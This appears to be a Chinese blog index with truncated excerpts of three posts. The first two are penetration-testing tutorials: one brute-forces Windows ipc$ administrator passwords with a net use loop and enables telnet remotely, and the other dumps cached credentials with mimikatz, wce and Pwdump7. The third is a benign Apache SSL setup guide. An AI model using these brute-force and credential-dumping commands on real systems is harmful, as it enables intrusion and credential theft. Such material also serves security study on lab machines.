内网渗透之ipc$漏洞

渗透环境xp

1、使用dos命令暴力破解远程ipc$主机密码

for /f %a in (e:\字典文件.txt) do net use \\对方ip地址\ipc$ %a /user:administrator

这条命令进行密码爆破吗,等到命令框显示”不允许一个用户使用一个以上用户名与服务器”即可停止,即可成功获取到密码 图片

使用 net use 命令可以查看是否与目的主机建立连接 ,net use * /del 命令可以清除当前连接状态 图片

2、开启telnet服务

sc \\192.168.2.132 query tlntsvr  查看对方telnet服务的状态
sc \\1[......]

继续阅读

后渗透之破解管理员密码

一、lc5爆破用户名密码(较老,不实用)

傻瓜式安装,然后自动得到hash

 

二、 抓缓存中的明文密码(mimikatz、wce、Pwdump7等)(较实用)

MIMIKATZ:

      privilege::debug
      sekurlsa::logonpasswords

 

WCE:

    wce -w

Pwdump7:

   Pwdump7.exe

 

1、建立ipc$共享连接

2、上传需要的文件

3、设置telnet远程连接开启方式为自动,并开启telnet服[……]

继续阅读

LAMP(Apache)环境安装SSL安全证书网站支持HTTPS

一、申请免费的SSL数字证书

我用的是西部数码的域名,就免费申请了一个一年的SSL证书
具体步骤不再叙述,注意要记住密码。申请成功后,下载相应的证书即可,我下载的是pem格式的。

二、在服务器部署证书服务

1、 安装相应的SSL模块

yum install openssl
yum install mod_ssl

2、 配置SSL文件

配置 /etc/httpd/conf.d/ssl.conf 文件。与配置httpd.conf文件相同
主要改以下配置

LoadModule ssl_module modules/mod_ssl.so一行去掉前面的#
<Virtual[......]

继续阅读